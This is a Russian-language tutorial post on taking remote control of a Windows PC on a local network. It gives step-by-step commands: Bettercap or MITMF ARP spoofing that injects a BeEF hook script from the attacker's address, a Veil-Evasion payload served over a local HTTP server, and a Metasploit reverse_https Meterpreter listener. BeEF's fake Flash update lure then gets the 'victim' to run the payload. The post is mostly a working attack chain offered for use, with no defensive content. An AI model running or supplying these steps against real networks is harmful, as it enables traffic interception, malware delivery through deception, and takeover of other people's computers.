Как получить удаленный доступ к ПК

Как получить удаленный доступ к ПК

@darkoct

Всем привет.

Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.

Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.

Для этого нам понадобиться:

1.Veil-Evasion.

2.Metasploit.

3.Beef.

4 Bettercap ( Mitmf тоже подойдет ).

Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,

кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:

https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/

Metasploit и Beef стоят в самом дистрибутиве кали.

Bettercap устанавливаем командой apt-get install bettercap

Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

лечиться это следующей заплаткой

easy_install -U pip

pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,

это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).

Он позволяет выжать максимум из внедрения JS-кода.

Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.


А сейчас давайте приступим к практической реализации.

1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/

./beef

Консоль не закрываем!

Далее открываем браузер и в строке вводим следующий адрес


http://localhost:3000/ui/authentication


Login: beef

Pasword: beef

после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.

2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:


sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.

адрес 192.168.0.102 -это адрес машины с которой мы атакуем.

Консоль не закрываем!


Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:


python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js


wlan0-это интерфейс

192.168.0.15 это адрес роутера, узнать его можно командой route -n


Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.

Еще раз повторюсь, по данной ссылке:

https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/

вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.


После того как сгенерировали файл , нам нужно запустить сервер.

я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой


python -m SimpleHTTPServer 8081 

консоль не закрываем!


Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)

Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).


Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так

msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc


Для тех кто не ищет легких путей:

запускаем метасплойт командой: msfconsole

далее вводим:


use multi/handler

set payload windows/meterpreter/reverse_https

set LHOST 192.168.0.102 (свой внутренний IP )

set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)

exploit

Консоль не закрываем!

ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.


Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.

Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.

Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.


Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.

В моем случае это выглядит таким образом :

http://192.168.0.102:3000/adobe/flash_update.png

http://192.168.0.102:8081/flash_update12.exe 

Далее в нижнем правом углу нажимаем на кнопку Execute.

Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.


На этом пока всё, спасибо за внимание.

Подписывайся на канал, что бы не пропустить ничего - Dark Octopus

Report Page